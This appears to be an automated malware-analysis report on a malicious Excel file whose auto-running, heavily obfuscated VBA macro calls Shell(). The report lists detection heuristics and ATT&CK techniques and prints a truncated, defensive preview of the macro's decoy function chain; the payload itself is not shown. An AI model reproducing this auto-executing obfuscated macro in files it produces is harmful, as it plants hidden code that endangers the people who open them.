MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is an Excel file containing a Workbook_Open macro that uses the Shell() function, indicating it is designed to execute arbitrary commands. The embedded VBA code is heavily obfuscated, but the presence of the Workbook_Open and Shell() calls, along with the ClamAV detection name, strongly suggests a downloader or dropper functionality. The document body displays a fake macro error message to lure the user into enabling macros.
Heuristics 5
-
ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 111647 bytes |
SHA-256: 9cdc01132fcdb78f68afae0f955a3e45ae3c31ffe521d26a5b94a24b2ccd6259 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kurban2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Kurban1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub
Static Function BxXRyBtUEullqxI() As Long
Call YWLZgeFDdMFbImw
End Function
Function YWLZgeFDdMFbImw() As Double
Call YbLqaeqCChBbWFv
End Function
Private Function YbLqaeqCChBbWFv() As Currency
Call xsiMYFgWvzgqxbT
End Function
Static Function xsiMYFgWvzgqxbT() As Long
Call MLaGLqStUSrTNsK
End Function
Static Sub MLaGLqStUSrTNsK()
Call lUhqXRnzimiHxuS
End Sub
Function lUhqXRnzimiHxuS() As Boolean
Call CeJxYADIbGFIWst
End Function
Private Sub CeJxYADIbGFIWst()
Call WRsQuUeetVAMayH
End Sub
Static Sub WRsQuUeetVAMayH()
Call oUDlKDYYHqimJcS
End Sub
Static Sub oUDlKDYYHqimJcS()
Call eimMeNZoqKzbEJB
End Sub
Private Sub eimMeNZoqKzbEJB()
Call LyqKnfVGEdxdpkF
End Sub
Private Function LyqKnfVGEdxdpkF() As Double
Call CFJyWoAHJxartyY
End Function
Private Function CFJyWoAHJxartyY() As String
Call lNwKtGaLsSjSmGM
End Function
Sub lNwKtGaLsSjSmGM()
Call rgIcVzHkwkcHtRX
End Sub
Private Sub rgIcVzHkwkcHtRX()
Call pCoRlCiMeCBKpXD
End Sub
Private Function pCoRlCiMeCBKpXD() As Variant
Call xNjxbutXDWFYFOz
End Function
Static Sub xNjxbutXDWFYFOz()
Call wbzAHvzkHpqAKBO
End Sub
Function wbzAHvzkHpqAKBO() As Date
Call FeesMmohBKFniZt
End Function
Private Function FeesMmohBKFniZt() As Object
Call TFmZjYwSEcGrqJB
End Function
Private Function TFmZjYwSEcGrqJB() As Date
Call dBBfDOPATygDXOQ
End Function
Private Function dBBfDOPATygDXOQ() As Byte
Call tTtZqyBXsRrfofI
End Function
Sub tTtZqyBXsRrfofI()
Call SdAJCZWdGliUXhP
End Sub
Private Function SdAJCZWdGliUXhP() As Integer
Call jnbQEImmAFFVxer
End Function
Private Sub jnbQEImmAFFVxer()
Call XJbdJTIQOWLljfq
End Sub
Sub XJbdJTIQOWLljfq()
Call wZGZEtiAOQgfSoR
End Sub
Sub wZGZEtiAOQgfSoR()
Call mopzYDjPxjxTNVB
End Sub
Static Function mopzYDjPxjxTNVB() As Boolean
Call TDtyhWfhLCwVyxE
End Function
Static Sub TDtyhWfhLCwVyxE()
Call YfVCtQhVuTdmvbg
End Sub
Static Function YfVCtQhVuTdmvbg() As Double
Call HnIORiHZdnnNpjU
End Function
Function HnIORiHZdnnNpjU() As Integer
Call zmLQPqRMCJaACdX
End Function
Static Function zmLQPqRMCJaACdX() As Single
Call xHrFfssnlbACyjC
End Function
Static Function xHrFfssnlbACyjC() As Long
Call FTmlVkDyKvDROby
End Function
Sub FTmlVkDyKvDROby()
Call DgCoAlJMOOosTNN
End Sub
Private Function DgCoAlJMOOosTNN() As Object
Call aFqwjOWumgIilCB
End Function
Static Function aFqwjOWumgIilCB()
Call bKpNdOGtLBEjzVB
End Function
Private Function bKpNdOGtLBEjzVB() As Object
Call zbNjbqwOEUjyarY
End Function
Static Sub zbNjbqwOEUjyarY()
Call AYwNkpLzyqqYxrH
End Sub
Private Sub AYwNkpLzyqqYxrH()
Call oDMNaBDrrGlPaLX
End Sub
Static Sub oDMNaBDrrGlPaLX()
Call lahtmJcecHvKzRE
End Sub
Function lahtmJcecHvKzRE() As Currency
Call MbYqOjbWMcwXrAv
End Function
Private Function MbYqOjbWMcwXrAv() As Object
Call szsbIDtCFujATvP
End Function
Private Sub szsbIDtCFujATvP()
Call iOcCcNuSoNApOcy
End Sub
Static Sub iOcCcNuSoNApOcy()
Call PdfAlgqkCgzrzDC
End Sub
Function PdfAlgqkCgzrzDC() As String
Call GkzoToVmGBbEDRV
End Function
Function GkzoToVmGBbEDRV()
Call osmArGvppVlfxZJ
End Function
Private Sub osmArGvppVlfxZJ()
Call vMySSzbPtndVEkU
End Sub
Static Sub vMySSzbPtndVEkU()
Call fMVrFQgExJyVGZs
End Sub
Function fMVrFQgExJyVGZs()
Call AtZnZuOBBZGmPhv
End Function
Private Sub AtZnZuOBBZGmPhv()
Call zGpqEvUOFtrOVUL
End Sub
Static Function zGpqEvUOFtrOVUL() As Byte
Call IKUiJmJLyOGBtsq
End Functio
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.